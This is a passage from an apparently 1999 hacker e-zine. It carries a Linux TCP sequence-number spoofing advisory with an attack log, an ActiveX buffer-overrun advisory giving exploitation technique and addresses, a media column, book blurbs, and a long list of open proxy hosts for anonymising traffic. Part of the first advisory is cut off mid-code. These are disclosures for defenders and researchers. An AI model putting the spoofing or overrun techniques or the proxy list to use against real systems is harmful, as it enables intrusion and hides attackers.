~~~~~~~~~~~~~~~~~~ MOST of the time it is to make a name and become known/noticed, but on some occasions people do it for a reason, to prove faulty security, to protest against a certain problem in the world or a personal dispute. Well that pretty much covers 1999. Most of the remembered parts up to now anyways. Thanks allot, I prefer to remain anonymous. Sites to check out : Rootshell , Attrition , HNN and OSAll Written by anonymous for HNS (www.net-security.org ) 3. V U L N E R A B I L I T Y S ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1. Linux Kernel 2.2.x ISN Vulnerability - 1.1 Systems Affected - 1.2 Tests - 1.3 Impact - 1.4 Explanation - 1.5 Solution - 1.6 Acknowledgments - 1.7 Contact Information - 1.8 References - 1.9 Exploit 1. Linux Kernel 2.2.x ISN Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ TESO Security Advisory 26/09/1999 Linux Kernel 2.2.x ISN Vulnerability Summary: A weakness within the TCP stack in Linux 2.2.x kernels has been discovered. The vulnerability makes it possible to "blind-spoof" TCP connections. It's therefore possible for an attacker to initiate a TCP connection from an arbitrary non existing or unresponding IP source address, exploiting IP address based access control mechanisms. Linux 2.0.x kernels were tested against this attack and found not to be vulnerable in any case. 1.1 Systems Affected ~~~~~~~~~~~~~~~~~~~~ All systems running the kernel versions 2.2.x of the Linux operating system. Linux 2.3.x systems may be affected, too, we didn't tested this versions. In our test situations we noticed that it doesn't seem to matter whether the TCP syncookie functionality was enabled or not (enabled within the kernel and activated through the proc filesystem options). 1.2 Tests ~~~~~~~~~ This is the beginning of a log of a successfully mounted blind TCP spoofing attack agains a Linux 2.2.12 system. (tcpdump output formatted for better readability) 16:23:02.727540 attacker.522 > victim.ssh : S 446679473: 446679473(0) 16:23:02.728371 victim.ssh > attacker.522: S 3929852318:3929852318(0) 16:23:02.734448 11.11.11.11.522 > victim.ssh: S 446679473: 446679473(0) 16:23:02.734599 victim.ssh > 11.11.11.11.522: S 3929859164:3929859164(0) 16:23:03.014941 attacker.522 > victim.ssh: R 446679474: 446679474(0) 16:23:05.983368 victim.ssh > 11.11.11.11.522: S 3929859164:3929859164(0) 16:23:06.473192 11.11.11.11.522 > victim.ssh: . ack 3929855318 16:23:06.473427 victim.ssh > 11.11.11.11.522: R 3929855318:3929855318(0) 16:23:06.554958 11.11.11.11.522 > victim.ssh: . ack 3929855319 16:23:06.555119 victim.ssh > 11.11.11.11.522: R 3929855319:3929855319(0) 16:23:06.637731 11.11.11.11.522 > victim.ssh: . ack 3929855320 16:23:06.637909 victim.ssh > 11.11.11.11.522: R 3929855320:3929855320(0) ... The first ISN of the victim's host is 3929852318, which is within a SYNACK packet to the attackers host. This is unspoofed and can be easily snagged by the attacker. At the same time the attacker sent out the first unspoofed SYN packet he sent a spoofed SYN packet from 11.11.11.11 too. This packet is answered by the victims host too with the ISN of 3929859164. The difference between the first visible ISN and the second ISN is only (3929859164-3929852318) = 6846. Please notice that all TCP and IP parameters of the spoofed packet, except for the IP source address are the same as of the unspoofed packet. This is important (see below). This small differences within the initial TCP sequence number (ISN) is exploitable. In other tests, where both hosts were unlagged we even had differences below 500 sometimes. We've managed to successfully blind spoof TCP connections on different Linux 2.2.x systems, that is reaching the TCP "ESTABLISHED" state without being able to sniff the victim host. 1.3 Impact ~~~~~~~~~~ By sending packets from a trusted source address, attackers could possibly bypass address based authentication and security mechanisms. There have been similiar exploiting technics, aimed especially at r* and NFS services, in the past that demonstrated the security impact of weak ISNs very well. We have written a working exploit to demonstrate the weakness. 1.4 Explanation ~~~~~~~~~~~~~~~ The problem relies on a implementation flaw within the random ISN algorithm in the Linux kernel. The problem is within drivers/char/random.c, line 1684: __u32 secure_tcp_sequence_number(__u32 saddr, __u32 daddr, __u16 sport, __u16 dport) { ... static __u32 secret[12]; ... secret[0]=saddr; secret[1]=daddr; secret[2]=(sport << 16) + dport; seq = (halfMD4Transform(secret+8, secret) & ((1< S. Krahmer This advisory has been written by typo and scut. The tests and further analyzation were done by stealth and scut. The demonstration exploit has been written by S. Krahmer. 1.7 Contact Information ~~~~~~~~~~~~~~~~~~~~~~~ The teso crew can be reached by mailing to The teso crew can be reached by mailing to teso@shellcode.org. Our webpage is at 1.8 References ~~~~~~~~~~~~~~ [1] Mail to the Bugtraq mailing list From: Roy Hills > Subject: NT Predictable Initial TCP Sequence numbers - changes observed with SP4 [2] Microsoft Knowledge Database Article ID: Q192292 "Unpredictable TCP Sequence Numbers in SP4". [3] libUSI++, a spoofing library [4] TESO [5] S. Krahmer 1.9 Exploit ~~~~~~~ We've created a working exploit to demonstrate the vulnerability. The exploit needs libUSI++ installed, which can be obtained through [3]. The exploit is available from either or ------ 4. R E A D I N G M A T E R I A L ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Books: - Mastering Network Security - Do you need to secure your network? Here's the book that will help you implement and maintain effective network security, no matter what size your network is or which NOS you're using. Packed with practical advice and indispensable information, this book systematically identifies the threats that your network faces and explains how to eliminate or minimize them. Covers all major network operating systems -- NT, NetWare, and Unix -- and all aspects of network security, from physical security of premises and equipment to anti-hacker countermeasures to setting up your own Virtual Private Networks. The CD includes evaluation and demonstration versions of commercial firewalls, intrusion detection software, and a complete security policy. - Cisco IOS Network Security - Divided into five sections, the stage is set in the book's first chapter on security fundamentals. Cautioning against a slapdash approach, the authors offer pointers on developing and implementing a security policy for your organization. Heavily promoted is Cisco's Authentication, Authorization, and Accounting (AAA) security framework. Authentication lets you identify your users, authorization lets you decide what they can and can't have access to, and accounting lets you know what processes users are running and how much of the network's resources they are consuming. Cisco's team maintains that the AAA system forces you to keep a tight rein on your network, ultimately resulting in a more secure environment. - Cryptography and Network Security : Principles and Practice - KEY BENEFIT: This book presents detailed coverage of network security technology, the standards that are being developed for security in an internetworking environment, and the practical issues involved in developing security applications. KEY TOPICS: Opening with a tutorial and survey on network security technology, Stallings provides a sound mathematical foundation for developing the algorithms and results that are the cornerstone of network security. Each basic building block of network security is covered, including conventional and public-key cryptography, authentication, and digital signatures, as are methods for countering hackers and other intruders and viruses. The balance of the book is devoted to an insightful and thorough discussion of all the latest important network security applications, including PGP, PEM, Kerberos, and SNMPv2 security. Now in its Second Edition, the book has been completely updated, reflecting the latest developments in the field. - Internet Security : Professional Reference - Internet Security covers far more material than most other books on the subject, but--inevitably--in less depth. You'll find chapters on daemons, Unix-to-Unix copy (UUCP), audit trails, spoofing and sniffing, SATAN, Kerberos, encryption and PGP, Java, CGI, and viruses. Encompassing such a broad range of material in detail is risky, and this book suffers from several gaps. For example, the subject of electronic commerce goes untouched, with no mention of payment-specific schemes such as CyberCash or protocols such as Secure Electronic Transaction (SET). For those topics that are included, the level of depth varies considerably: Some topics are covered by well-written overviews, others by listing the programs' parameters in excruciating detail, and still others by simplistic tutorials that seem out of place in a technical volume. In addition, there are topics such as encryption, which are scattered across many sections. i got multitasking skills so i am sex0ring and chatting at the same time copyright (c) SLa5H ,member of HWA.hax0r.news @HWA 15.0 Forbidden Knowledge #7 is being released ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [15:50] FK7 haz da following 1nph0z3: Summary of the new telecommunications act, Windows NT low level security features and how they interact with virtual memory and process management, Use and Abuse of offline internet access services, Defeating portscan detection, An introduction to using gawk, Some serious commentary on the government and on the hacking scene, A Mass Fake Portscanner, A Mass CGI Vulnerability Scanner with Wingate Support, A PortSentry Scanner and more... @HWA 16.0 The 'real' story behind JP and PSS as per Forbes magazine... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Via PSS http://www.forbes.com/columnists/penenberg/ Go head and sue! IT'S A SAD FACT, but whenever someone is cited as an expert in one publication, he is almost sure to be quoted in another--and another and another. The reason is simple: The first thing a journalist does when beginning a story is to see what else has been written on the topic. Culling sources from other news articles is a good way to get started. The problem is, few reporters check out these "experts," figuring that if a source made it into, say, The New York Times or The Washington Post, he must be reliable and, well, expert. Think of it as an extension of Howard Stern's media strategy. Stern once said he himself first coined the term "King of All Media," figuring that the mainstream press would then start to call him that. (It did.) How else to explain the schizophrenic emergence of twenty-year-old John Vranesevich, founder and operator of antionline.com, a web site that purports to follow the hacker scene. In the realm of mass media, "JP" has become a star, a youthful public figure who has been quoted extensively for his computer-security expertise and inside knowledge of the hacking world. But in hacker circles he is a pariah. Perhaps only his close ally, Carolyn Meinel (a.k.a. "The Happy Hacker"), inspires more vitriol. At this year's Defcon, the hacker conference held in Las Vegas, Meinel had the dubious honor of being bodily ejected from the convention hall. It's hard to gauge just how elite JP's hacker and computer-security skills are. But we do know his web site was taken down in August when someone with an account in Russia tricked AntiOnline into downloading software that redirected its visitors to another site. The hacker, obviously not a fan of JP's, included this message: "Expensive security systems do not protect from stupidity." And online columnist Lew Koch, of CyberWire Dispatch, interviewed JP at length, exposing vast gaps of knowledge. For instance, Koch questioned JP about AntiOnline's alleged scoop of the hack of an atomic research center last year, yet he couldn't remember which country housed the center. JP kept insisting it was Israel, and, according to Koch, called the Bombay Atomic Research Center the "B'Hadvah Atomic Research Center." When Koch corrected him, JP admitted it must have been India. JP also claims he has "semi-contractual" relationships with NASA and the Defense Informations Systems Agency (DISA), yet Koch says both agencies deny this. But the mass media appears ignorant of this. The New York Times turned to Vranesevich when it needed comment on a rash of anti-government hacks, while The Wall Street Journal Europe dubbed him an "online-security specialist." The Baltimore Sun asked for his opinion on the hack of the Johns Hopkins' medical school site. The Orange County Register invited him to bash hacker/martyr Kevin Mitnick, which he did with glee, saying that hackers don't have a clue about Mitnick's case, they "just heard it's cool to support Mitnick, and that is what they do." And the San Diego Union-Tribune dialed him up to ask about the threat of computer viruses. Of course, JP has nothing against good press. It's the bad press that let's him unsheath his sharpest weapon. No, not the facts; those would only get in the way. We're talking about the threat of a lawsuit. In June, JP contacted Harvard University to complain about a computer-security web site rival called PacketStorm, which had posted some nasty pictures, along with even nastier commentary. Harvard, afraid of a lawsuit, pulled the site, which was a favorite of computer-security professionals. JP claims on his web site that he didn't explicitly threaten lawsuit, but the University certainly took it that way. A Harvard spokesman told me this was the first time Harvard had ever pulled the plug on a site for "objectionable material." (Eventually, PacketStorm found a home with Kroll-O'Gara, the big-time detective agency in New York.) Then in July, The Ottawa Citizen ran a story about JP, reporting allegations that JP is under investigation by the FBI for "employing hackers to target high-profile sites in order to scoop the rest of the media with exclusive reporting." Vranesevich contacted the newspaper and threatened to sue. Although Mark Anderson, The Citizen's high tech editor, said he was confident in the story, the FBI would not comment whether it was in fact investigating JP or not, even though several other sources in the know insisted he was. As a result, the Citizen removed the story from its web site, rather than face a potential lawsuit. "It's sad," Anderson says. "You're confident you have reliable information, but the threat of a lawsuit forces you to pull your story. The onus was on us to prove that Vranesevich is under investigation by the FBI, but the FBI wouldn't say it outright. Since Canadian libel law is tougher than American libel law, we felt we had no choice." In addition, folks trolling around cyberspace say that Vranesevich has threatened them with lawsuits whenever they post anything negative about him on their web sites. I wonder what he would do if someone actually took him up on this, since lawyers are expensive and, by all accounts, JP's business is far from being a cash cow. Perhaps, after reading this, he'll even sue me. @HWA 17.0 ActiveX Buffer Overruns Advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: I'm not responsible for anything, unless it's good. This advisory outlines several buffer overruns in several controls, and the vulnerability of ActiveX controls to buffer overrun attacks in general. It appears that the ActiveX/OLE/COM technology in general does no buffer checks before passing parameters to controls, leaving the checking up to the control in question. Hence, many poorly written controls are individually susceptible to buffer overrun attacks, independent of the environment they are controlled from, and other controls on the system. The following controls are probably just a few of the vulnerable controls which are in common use, including one control from a third party vendor (Adobe). Because these controls are marked as safe for scripting, they may be exploited through IE through a web page, E-mail, or anywhere else where 'safe' ActiveX controls may be scripted (ie some newsgroup readers and other E-mail clients) Known Affected Controls: Acrobat Control for ActiveX - PDF.OCX v1.3.188 Setupctl 1.0 Type Library - SETUPCTL.DLL v1, 1, 0, 6 EYEDOG OLE Control module - EYEDOG.OCX v1.1.1.75 MSN ActiveX Setup BBS Control - SETUPBBS.OCX v4.71.0.10 hhopen OLE Control Module - HHOPEN.OCX v1, 0, 0, 1 RegWizCtrl 1.0 Type Library - REGWIZC.DLL v3, 0, 0, 0 Each control contains at least one method, which does incorrect handling of strings, and when manipulating a string too large, a classic buffer overrun can occur, allowing arbitrary code to be executed on the client. Protection: Microsoft has been notified of these exploits around a month ago, and is releasing a patch to revoke the hhopen, regwiz and setupctl controls, and a previous patch has been released for Eyedog. For the other controls, and any others found to be vulnerable, see Microsoft knowledge base article Q240797 on how to stop an ActiveX control from running in IE. If pain persists, disable ActiveX scripting altogether in IE. How to Stop an ActiveX Control from Running in Internet Explorer http://support.microsoft.com/support/kb/articles/q240/7/97.a sp Details: For each exploit, we have full control of the RET address, knowing where to RET to in order to execute our code is easier for some controls than others. For the controls where no known fixed or referenced location of the code can be found, I will simply RET to ExitProcess, although it is still possible but more difficult to execute arbitrary code. For the exploits which are easy to RET to the code, I will demonstrate how to execute a program (CALC.EXE) using fixed API locations in Win98, you will need to modify these addresses depending on the versions in use. For the exploits, similar to a couple other Win exploits, a JMP ESP is required to get to the code. I didn't manage to find one in Kernel32 or IExplore, however there does appear to be one in Shell32 (version 4.72.3110.6) at (7FD035EB), you will also need to modify this address depending on your version. So if you get a crash at around this address, then it is most likely possible to run the exploit, the address just needs to be changed. It should be noted that arbitrary code may be executed, not just running a program, this is just an example. Also, I haven't tried posting HTML to this forum before, so hopefully it will turn out ok, if not, could the moderators please convert the HTML to plaintext or something. ============================================================ EYEDOG: With this control, MSInfoLoadFile is the offending method. There is no easy way to RET to our code, so instead, I have shown how to simply RET to ExitProcess directly. This will cause the host to terminate. ============================================================ HHOPEN: This control is a little more difficult to exploit, as the RET address is in the middle of the string, and once again there is no easy way to RET to our code, so I have RET'd to ExitProcess directly instead. In this case, OpenHelp is the vulnerable method, and the exploit is possible when the method is called with a valid help file, and a long Help Section. ============================================================ SETUPBBS: When this control is initialised, it will display a prompt notifying the user that the control is capable of modifying Mail and News configuration etc and asks the user whether he/she wishes the control to proceed. This control is exploitable through two different methods, vAddNewsServer and bIsNewsServerConfigured. I have simply RET'd to ExitProcess with this exploit, although there are other possibilities. ============================================================ PDF This control from Adobe Acrobat, can be exploited through the setview method, and because ESP points to the address after the RET address, we can place arbitrary code at this point and JMP to it by RET'ing to a JMP ESP, in this case, one found in Shell32. The code simply executes CALC.EXE then calls ExitProcess to terminate the host without it crashing. I have attempted to notify Adobe of the issue, however they don't appear to have any form of direct secure@ address. ============================================================ SETUPCTL Apparently a control that was once used for the IE update web site which is no longer in use, although it should still exist on a lot of systems. With this exploit, similar to the PDF exploit, ESP points to our code so we simply RET to the same JMP ESP in Shell32. Also, this exploit differs in that we set a property first (DistUnit) with the long string, then call the method (InstallNow). Again, I have simply demonstrated how to execute CALC.EXE, though any code can be executed. ============================================================ REGWIZC The Registration Wizard control used by Microsoft to register MS products also contains a buffer overrun in the 'InvokeRegWizard' method. When called with a long string, pre-pended with '/i', we can gain control of the RET address and exploit the control in a similar manner as the PDF control. This exploit will cause a 'Regwiz.log' file to be created in the temporary directory, and once again will execute CALC.EXE and terminate the host. ============================================================ Sorry for the length of this advisory, but as there are several exploits, and probably many more, it was necessary. It should be noted, that not only MS ActiveX controls are susceptible, but also many other vendors controls. I cannot possibly go through all the controls which are available to the public, but the controls which are installed by default on most systems are obviously the most serious. -Shane Hird First year IT student at QUT, Brisbane, Australia. Sponsors? 18.0 CyberArmy: Wingates list ~~~~~~~~~~~~~~~~~~~~~~~~ Some are bad, some are good, some are undoubtably phishes or traps, buyer beware. These are posted here as always with no strings, they come from a third party and are posted in order for you to make sure YOU aren't on this list! 209.112.31.34 [latency: 10/01/99 16:14:15 PDT by sandoc] 210.169.139.161 [latency: 10/01/99 16:12:44 PDT by sandoc] 207.107.88.21 [latency: 10/01/99 15:29:03 PDT by sandoc] 212.174.65.76 [latency: 10/01/99 14:52:38 PDT by sandoc] ss06.co.us.ibm.com [latency: 10/01/99 14:49:32 PDT by sandoc] o u mind...if i fuck u? [latency: 10/01/99 13:00:20 PDT by Ivan Dimitrov] 198.247.215.1 [latency: 09/30/99 15:02:12 PDT] mh.gymnaziumtu.cz [latency: 09/30/99 13:21:22 PDT by sandoc] 210.114.231.130 [latency: 09/30/99 13:18:59 PDT by sandoc] 210.56.18.225 [latency: 09/30/99 13:16:33 PDT by sandoc] pen22755-1.gw.connect.com.au [latency: 09/30/99 13:14:19 PDT by sandoc] cix.abaco.edu.pe [latency: 09/30/99 13:09:37 PDT by sandoc] note.ark.ne.jp [latency: 09/30/99 13:07:40 PDT by sandoc] 208.5.13.15 [latency: 09/30/99 13:05:23 PDT by sandoc] 203.135.2.188 [latency: 09/30/99 13:01:51 PDT by sandoc] 193.227.185.190 [latency: 09/30/99 12:59:35 PDT by sandoc] 194.204.205.127 [latency: 09/30/99 12:58:22 PDT by sandoc] 193.227.181.144 [latency: 09/30/99 12:55:20 PDT by sandoc] 200.230.120.133 [latency: 09/30/99 12:53:51 PDT by sandoc] 194.75.255.156 [latency: 09/29/99 10:19:20 PDT by sandoc] infou429.jet.es [latency: 09/29/99 10:18:13 PDT by sandoc] 212.252.66.206 [latency: 09/29/99 10:16:50 PDT by sandoc] 203.197.208.36 [latency: 09/29/99 10:15:07 PDT by sandoc] 216.226.197.179 [latency: 09/29/99 10:05:53 PDT by sandoc] chaus.ozemail.com.au [latency: 09/29/99 10:04:12 PDT by sandoc] maodcfm.egat.or.th [latency: 09/29/99 10:01:24 PDT by sandoc] 200.46.20.185 [latency: 09/29/99 09:56:02 PDT by sandoc] 195.249.229.4 [latency: 09/29/99 09:53:20 PDT by sandoc] sscoin.com [latency: 09/29/99 09:47:10 PDT by sandoc] proxy.cyberg.it [latency: 09/29/99 08:46:47 PDT by aaa] 195.182.171.121 [latency: 09/29/99 05:27:51 PDT by Bi0Sk|lleR] whois.internic.net [latency: 09/28/99 10:57:58 PDT] 200.42.146.150 [latency: 09/28/99 10:03:10 PDT by sandoc] 203.197.9.162 [latency: 09/28/99 09:56:20 PDT by sandoc] mail.tbccorp.com [latency: 09/28/99 09:54:59 PDT by sandoc] MF2-1-036.mgfairfax.rr.com [latency: 09/28/99 09:48:25 PDT by sandoc] 195.146.98.226 [latency: 09/28/99 09:34:37 PDT by sandoc] 202.186.134.6 [latency: 09/28/99 04:30:26 PDT by B Wang] 207.139.234.203 [latency: 09/27/99 20:54:19 PDT by monster] radna-gw.supermedia.pl [latency: 09/27/99 20:30:25 PDT] DONT.WRITE. BULLSHIT.HERE [latency: 09/27/99 19:22:09 PDT by abed] 209.21.14.65 [latency: 09/27/99 13:40:26 PDT by sandoc] 192.117.8.253 [latency: 09/27/99 13:38:27 PDT by sandoc] 192.106.117.25 [latency: 09/27/99 13:35:07 PDT by sandoc] 212.68.152.3 [latency: 09/27/99 13:33:46 PDT by sandoc] 194.73.125.69 [latency: 09/27/99 13:29:42 PDT by sandoc] sie-home-1-7.urbanet.ch [latency: 09/27/99 13:09:32 PDT by sandoc] neptune.sunlink.net [latency: 09/27/99 08:51:15 PDT by Juxtaposition] 24.1.3.125 [latency: 09/27/99 08:32:57 PDT by Juxtaposition] 24.1.4.116 [latency: 09/27/99 08:31:56 PDT by Juxtaposition] sherlock.ibi.co.za [latency: 09/26/99 15:44:34 PDT by Juxtaposition] 207.50.228.163 [latency: 09/26/99 10:19:37 PDT by sandoc] 193.15.241.21 [latency: 09/26/99 10:10:53 PDT by sandoc] 194.25.204.29 [latency: 09/26/99 10:09:24 PDT by sandoc] 207.229.47.11 [latency: 09/26/99 10:08:00 PDT by sandoc] 205.237.210.214 [latency: 09/26/99 10:06:38 PDT by sandoc] c30-169.the-bridge.net [latency: 09/26/99 09:59:18 PDT by sandoc] 38.30.155.88 [latency: 09/25/99 21:17:05 PDT by Jame] 152.169.201.156 [latency: 09/25/99 20:23:48 PDT] 24.112.84.102 [latency: 09/25/99 13:11:04 PDT by BLaZeR u Newbie!] 24.112.84.94 [latency: 09/25/99 13:10:23 PDT by BLaZeR u NeWb! H] mail.trikotazas.lt [latency: 09/25/99 12:08:31 PDT by babysuk] 209.183.86.96 [latency: 09/25/99 11:11:55 PDT by Shogo] 206.103.12.131 [latency: 09/25/99 10:41:41 PDT by sandoc] proxy01.faboro.ch [latency: 09/25/99 10:36:49 PDT by sandoc] pc1.expansion.com.mx [latency: 09/25/99 10:36:06 PDT by sandoc] 207.3.122.85 [latency: 09/25/99 10:33:38 PDT by sandoc] radna-gw.supermedia.pl [latency: 09/25/99 10:29:52 PDT by sandoc] 202.135.160.10 [latency: 09/25/99 10:28:57 PDT by sandoc] gateway.eltjanst.se [latency: 09/25/99 10:26:13 PDT by sandoc] ns.holonic.co.jp [latency: 09/25/99 10:24:57 PDT by sandoc] 203.101.1.22 [latency: 09/25/99 10:23:18 PDT by sandoc] 163.121.200.72 [latency: 09/25/99 10:13:01 PDT] 195.216.48.13 [latency: 09/25/99 06:42:29 PDT] 24.112.84.93 [latency: 09/24/99 23:50:43 PDT by U R DEAD ZASZ U FAG] 24.112.97.9 [latency: 09/24/99 23:39:29 PDT by BLaZeR] 210.237.183.226 [latency: 09/24/99 20:55:02 PDT by ~TG|{~ZaSz] 200.210.15.188 [latency: 09/24/99 20:54:40 PDT by ZaSz] 24.226.156.214 [latency: 09/24/99 20:54:20 PDT by ZaSz] 202.21.8.31 [latency: 09/24/99 20:54:07 PDT by ZaSz] 202.21.8.21 [latency: 09/24/99 20:53:54 PDT by ~TG|{~ZaSz] 200.210.15.166 [latency: 09/24/99 20:53:34 PDT by ZaSz] 139.142.170.233 [latency: 09/24/99 20:53:22 PDT by ZaSz] 24.30.53.10 [latency: 09/24/99 20:53:10 PDT by ZaSz] 24.30.109.224 [latency: 09/24/99 20:52:44 PDT by ZaSz] 24.0.233.86 [latency: 09/24/99 20:52:34 PDT by ZaSz] 200.255.107.140 [latency: 09/24/99 20:52:11 PDT by ZaSz] 200.36.8.103 [latency: 09/24/99 20:51:56 PDT by ZaSz] 200.38.211.242 [latency: 09/24/99 20:51:42 PDT by ZaSz] 200.38.211.253 [latency: 09/24/99 20:51:24 PDT by ZaSz] 200.38.211.246 [latency: 09/24/99 20:51:10 PDT by ZaSz] 210.169.139.161 [latency: 09/24/99 20:50:59 PDT by ZaSz] 210.226.69.210 [latency: 09/24/99 20:50:48 PDT by ZaSz] 209.251.71.115 [latency: 09/24/99 20:50:30 PDT by ZaSz] 24.0.79.151 [latency: 09/24/99 20:50:18 PDT by ZaSz] 24.0.79.40 [latency: 09/24/99 20:50:05 PDT by ZaSz] 24.4.27.2 [latency: 09/24/99 20:49:49 PDT by ZaSz] 207.102.5.161 [latency: 09/24/99 20:49:36 PDT by ZaSz] 207.102.5.162 [latency: 09/24/99 20:49:21 PDT by ZaSz] 210.164.86.34 [latency: 09/24/99 20:49:06 PDT by ZaSz] 195.67.1.34 [latency: 09/24/99 20:48:12 PDT by ZaSz] 195.216.48.36 [latency: 09/24/99 20:47:54 PDT by ZaSz] 195.216.48.30 [latency: 09/24/99 20:47:41 PDT by ZaSz] 195.216.48.13 [latency: 09/24/99 20:47:24 PDT by ZaSz] 210.226.82.162 [latency: 09/24/99 20:47:06 PDT by ZaSz] 200.13.19.218 [latency: 09/24/99 20:46:51 PDT by ZaSz] 200.13.19.213 [latency: 09/24/99 20:46:36 PDT by ZaSz] 200.13.19.181 [latency: 09/24/99 20:46:21 PDT by ZaSz] 200.13.19.141 [latency: 09/24/99 20:46:08 PDT by ZaSz] 200.13.19.76 [latency: 09/24/99 20:45:55 PDT by ZaSz] 200.13.19.33 [latency: 09/24/99 20:45:43 PDT by ~TG|{~ZaSz] 195.182.171.121 [latency: 09/24/99 20:45:21 PDT by ZaSz] 24.112.39.232 [latency: 09/24/99 20:43:14 PDT by ZaSz] 24.2.29.54 [latency: 09/24/99 20:41:41 PDT by ZaSz] 24.112.75.210 [latency: 09/24/99 20:41:30 PDT by ZaSz] 24.112.7.143 [latency: 09/24/99 20:41:18 PDT by ZaSz] 24.93.15.248 [latency: 09/24/99 20:41:05 PDT by ZaSz] 24.64.210.14 [latency: 09/24/99 20:40:52 PDT by ZaSz] 24.112.167.186 [latency: 09/24/99 20:40:36 PDT by ZaSz] 203.102.199.109 [latency: 09/24/99 20:40:13 PDT by ZaSz] 210.161.200.82 [latency: 09/24/99 20:39:55 PDT by ZaSz] 207.102.5.162 [latency: 09/24/99 20:39:42 PDT by ZaSz] 207.102.5.161 [latency: 09/24/99 20:39:26 PDT by ZaSz] 203.102.199.209 [latency: 09/24/99 20:39:15 PDT by ZaSz] 203.102.199.186 [latency: 09/24/99 20:39:02 PDT by ZaSz] 203.102.199.72 [latency: 09/24/99 20:38:51 PDT by ZaSz] 203.102.199.21 [latency: 09/24/99 20:38:40 PDT by ZaSz] 203.102.199.22 [latency: 09/24/99 20:38:16 PDT by ZaSz] 203.102.199.11 [latency: 09/24/99 20:38:03 PDT by ZaSz] 209.165.135.138 [latency: 09/24/99 20:37:53 PDT by ZaSz] 216.72.47.33 [latency: 09/24/99 20:37:36 PDT by ZaSz] 216.72.47.18 [latency: 09/24/99 20:37:23 PDT by ZaSz] 216.72.47.16 [latency: 09/24/99 20:37:08 PDT by ZaSz] 216.72.47.12 [latency: 09/24/99 20:36:51 PDT by ~TG|{~ZaSz = ZaSz] 216.72.47.8 [latency: 09/24/99 20:36:14 PDT by ZaSz] 216.72.47.4 [latency: 09/24/99 20:36:01 PDT by ZaSz] 209.4.68.50 [latency: 09/24/99 20:35:44 PDT by ZaSz] 200.38.211.253 [latency: 09/24/99 20:35:32 PDT by ZaSz] 200.38.211.251 [latency: 09/24/99 20:35:08 PDT by ZaSz] 200.38.211.240 [latency: 09/24/99 20:34:49 PDT by ZaSz] 200.38.211.226 [latency: 09/24/99 20:34:37 PDT by ZaSz] 200.38.211.239 [latency: 09/24/99 20:34:18 PDT by ZaSz] 209.144.19.86 [latency: 09/24/99 20:34:05 PDT by ZaSz] 206.141.48.2 [latency: 09/24/99 20:33:53 PDT by ZaSz] 24.93.51.131 [latency: 09/24/99 20:33:33 PDT by ~TG|{~ZaSz] irc.dm.net.lb [latency: 09/24/99 14:22:40 PDT by Devil] DONT.WRITE. BULLSHIT.HERE [latency: 09/24/99 14:18:49 PDT by Devil] 156-21.dr.cgocable.ca [latency: 09/24/99 14:14:50 PDT by Devil] 209.198.248.139 [latency: 09/24/99 14:12:11 PDT by Devil] hs.state.az.us [latency: 09/24/99 14:11:23 PDT by Devil] 207.225.232.5 [latency: 09/24/99 13:18:41 PDT by sandoc] 212.252.147.144 [latency: 09/24/99 13:14:59 PDT by sandoc] 195.87.12.110 [latency: 09/24/99 13:04:21 PDT by sandoc] 195.14.129.129 [latency: 09/24/99 13:01:58 PDT by sandoc] 193.192.109.139 [latency: 09/24/99 13:00:46 PDT by sandoc] 194.204.240.157 [latency: 09/24/99 12:58:33 PDT by sandoc] 212.252.15.80 [latency: 09/24/99 12:54:30 PDT by sandoc] 212.252.149.99 [latency: 09/24/99 12:52:36 PDT by sandoc] ar5-120i.dial-up.arnes.si [latency: 09/24/99 12:50:01 PDT by sandoc] cuscon1658.tstt.net.tt [latency: 09/24/99 12:48:49 PDT by sandoc] host029210.ciudad.com.ar [latency: 09/24/99 12:46:36 PDT by sandoc] 202.213.244.234 [latency: 09/24/99 12:40:07 PDT by sandoc] asy26.as01.sol1.superonline.com [latency: 09/24/99 12:34:37 PDT by sandoc] 207.158.108.99 [latency: 09/24/99 12:32:59 PDT by sandoc] 212.33.193.146 [latency: 09/24/99 12:30:45 PDT by sandoc] cableweb.w3.to [latency: 09/23/99 20:03:23 PDT] ppp-15-78.cyberia.net.lb [latency: 09/23/99 13:43:06 PDT by sandoc] flammen.aof.no [latency: 09/23/99 13:41:38 PDT by sandoc] eta.riosoft.softex.br [latency: 09/23/99 13:40:05 PDT by sandoc] Pelican.CITY.UniSA.edu.au [latency: 09/23/99 13:37:07 PDT by sandoc] server1.wingsink.com [latency: 09/23/99 13:34:13 PDT by sandoc] mail.jgboswell.com [latency: 09/23/99 13:32:42 PDT by sandoc] 210.136.60.2 [latency: 09/23/99 13:31:36 PDT by sandoc] 210.145.140.245 [latency: 09/23/99 13:30:02 PDT by sandoc] dc.com.pl [latency: 09/23/99 13:27:43 PDT by sandoc] Tuva-Tcms17.krs.ru [latency: 09/23/99 13:26:13 PDT by sandoc] impexcabmet.LL.sl.ru [latency: 09/23/99 13:24:09 PDT by sandoc] proxy.cyberg.it [latency: 09/23/99 13:15:29 PDT by sandoc] 194.79.101.94 [latency: 09/23/99 13:13:27 PDT by sandoc] ns.bibliodata.net [latency: 09/23/99 13:11:38 PDT by sandoc] 194.213.239.19 [latency: 09/23/99 13:06:55 PDT by sandoc] server.tf.ITB.ac.id [latency: 09/23/99 13:04:38 PDT by sandoc] 212.133.139.3 [latency: 09/23/99 12:56:08 PDT by sandoc] 207.3.122.85 [latency: 09/23/99 12:54:12 PDT by sandoc] 210.237.183.226 [latency: 09/23/99 12:52:56 PDT by sandoc] dciserver.twfrierson.com [latency: 09/23/99 12:51:52 PDT by sandoc] as3-54.gto.net.om [latency: 09/23/99 12:48:46 PDT by sandoc] tirith.mngt.waikato.ac.nz [latency: 09/23/99 12:46:50 PDT by sandoc] ABD708E3.ipt.aol.com [latency: 09/23/99 12:45:24 PDT by sandoc] sil.am [latency: 09/23/99 11:40:39 PDT by [0uTw0rLd]] hs.state.az.us [latency: 09/22/99 20:34:48 PDT] 141.216.41.247 [latency: 09/22/99 11:38:31 PDT] 195.182.171.121 [latency: 09/22/99 07:17:12 PDT by N1C] chat.groovy.gr [latency: 09/21/99 13:46:58 PDT by aqile] 24.137.18.44 [latency: 09/21/99 13:44:00 PDT] 